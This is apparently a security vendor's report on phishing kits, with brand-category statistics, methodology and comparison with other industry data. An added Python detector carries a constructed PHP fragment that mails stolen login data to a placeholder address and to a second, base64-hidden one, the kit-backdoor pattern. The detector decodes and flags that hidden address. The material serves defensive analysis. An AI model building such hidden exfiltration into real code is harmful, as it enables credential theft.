Over the last month, PhishLabs analyzed nearly 9,000 phishing kits and variants available on compromised and clandestine servers, file sharing services, underground scammer forums, and various user-generated content sites such as blogs.
The following chart displays a breakdown of phishing kits we analyzed, based on the type of brand targeted. Financial Institutions, ePayment & Money Transfer Services, Social Networking Sites, and Email Services were the brand categories most frequently targeted by phishing kits, representing a combined 77% of kits analyzed.
Chart: Breakdown of Phishing Kit Targets
“Other” includes several brand types that were each targeted in less than 1% of the kit population, such as:
- File sharing sites
- Blogging sites
- Photo services
- Various "paywall" and subscription sites
- Job sites
- Parcel services
A phishing kit is a collection of files, typically including web pages, images, scripts, and webserver code, that can be installed on a webserver and be ready to collect stolen credentials and other sensitive information quickly and with minimal configuration. Phishing kits are sometimes made available for free, but those often include backdoors that allow the kit's author or distributor to receive copies of all stolen data or even take control of the server hosting the kit.
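As an added illustration of the kind of kit analysis described above (example code written for this page, not PhishLabs' tooling), the script below walks a kit's files, pulls the exfiltration addresses out of its PHP code, and flags a suspected backdoor when a recipient is hidden behind base64_decode() rather than configured in the clear. The kit contents and addresses are constructed placeholders, and the base64 pattern is assumed to be one of several ways a second recipient can be concealed.

```python
import base64
import re

# Constructed stand-in for the server-side part of a kit (not a real kit): a visible
# exfiltration address plus a base64-hidden second recipient, the "backdoor" pattern
# the text describes. Both addresses are placeholders.
HIDDEN = base64.b64encode(b"author@example.invalid").decode()
SAMPLE_KIT_FILES = {
    "index.php": "<?php include 'login.html'; ?>",
    "post.php": (
        "<?php\n"
        '$to = "operator@example.invalid";\n'
        'mail($to, "Login", $msg);\n'
        f'mail(base64_decode("{HIDDEN}"), "Login", $msg);\n'
        "?>"
    ),
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_CALL_RE = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")


def extract_recipients(source):
    """Return (plain, hidden): addresses written in clear text and addresses
    recovered from base64_decode() string arguments in one PHP source file."""
    plain = set(EMAIL_RE.findall(source))
    hidden = set()
    for blob in B64_CALL_RE.findall(source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        hidden.update(EMAIL_RE.findall(decoded))
    return plain, hidden


def analyze_kit(files):
    """Walk a kit's files (name -> source) and flag a suspected backdoor when a
    hidden recipient is not among the openly configured ones."""
    plain, hidden = set(), set()
    for name, source in files.items():
        if name.lower().endswith(".php"):
            p, h = extract_recipients(source)
            plain |= p
            hidden |= h
    return {
        "plain_recipients": sorted(plain),
        "hidden_recipients": sorted(hidden),
        "backdoor_suspected": bool(hidden - plain),
    }
```

Running `analyze_kit(SAMPLE_KIT_FILES)` reports the hidden author address as a suspected backdoor; the recovered addresses are exactly the intelligence artifacts an analyst would feed into takedown and blocking work.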
Purpose and methodology
In general, analyzing the kits used to enable phishing attacks provides a different perspective than analyzing phishing emails and phishing sites (which is very useful as well). This additional perspective helps to better understand the phishing landscape, specifically regarding the demand for kits targeting specific organizations and the potential actors involved in attacks.
PhishLabs also analyzes kits to understand how technologies are leveraged, which tactics are used, and what intelligence artifacts can be recovered in order to deploy more efficient and effective countermeasures. For example, there were four phishing kits related to Bitcoin: a community forum kit, a payment services kit, and two kits each imitating a different exchange; however, none utilized invoicing or the new Payment Request feature as part of the ruse.
Some of the kits analyzed were obviously intended for widespread, indiscriminate distribution. Others were more targeted or customized for private use, and some appeared to be hand-crafted for a particular purpose or an exclusive target. In addition to showing up high in search results through malicious SEO (search engine optimization) tactics, links to phishing websites using these kits are delivered via spam email, SMS text messages, instant messenger services, and posts on social media websites and blogs.
Some kits target multiple brands, and the categories are somewhat qualitative, based generally on the interests of PhishLabs' clients. For example, a kit that includes two online banking brands and another kit that emulates two different service portals operated by the same financial institution were each counted as a single kit under the Financial Institutions category.
Where categories overlapped, phishing kits were assigned using consistent criteria throughout the analysis. For example, a successful Google or Microsoft phish could be used for any number of different services (email, messaging, social networking, gaming, app stores, blogging, cloud services, etc.). A phishing kit that explicitly targets Gmail was classified under Email Services, while a generic Google Drive phishing kit was assigned to the Other category.
Similarly, phishing kits targeting Amazon might be classified under eCommerce or Content Provider depending on whether the phishing kit targeted Amazon's online store or their content services (Amazon Instant Video, Amazon MP3, Amazon Appstore, Kindle content, etc.). When category criteria needed to be applied to resolve overlap between categories, it was applied consistently.
How does this compare to other industry breakdowns of phishing targets?
To the best of our knowledge, there has not been a similar breakdown of phishing kit data conducted and published in recent years. Other industry breakdowns of phishing targets have used phishing emails, sites, or URLs to shed light on the organizations targeted.
APWG publishes quarterly Phishing Attack Trends Reports that are based on unique phishing email campaigns and unique phishing sites. The most recent report indicates 78% of attacks target Financial and Payment Service companies. Attacks targeting Social Networking accounted for less than 1%.
Kaspersky Lab published an analysis they performed earlier this year based on clicks on phishing URLs by users of their anti-virus products. Their data showed that phishing URLs for email search sites and social networks were both clicked on by users far more than phishing URLs for financial services. This may indicate that recipients are generally more suspicious of emails with bank branding versus emails with social networking branding.
- Cybercriminals invest significant resources towards creating and distributing phishing kits targeting online accounts for online banking and payment services, many of which are under constant attack.
- Cybercriminals also see significant gain to be had by targeting social networking and email service credentials, which demonstrates the value of those accounts as components of cybercrime schemes.
- While most kits target the above categories, there was broad diversity among the kits analyzed. Cybercriminals are able to attack a very wide range of organizations without needing to create their own phishing content.
To learn more about phishing kits, how they are used, and how to defend against phishing attacks, download the How to Fight Back Against Phishing white paper.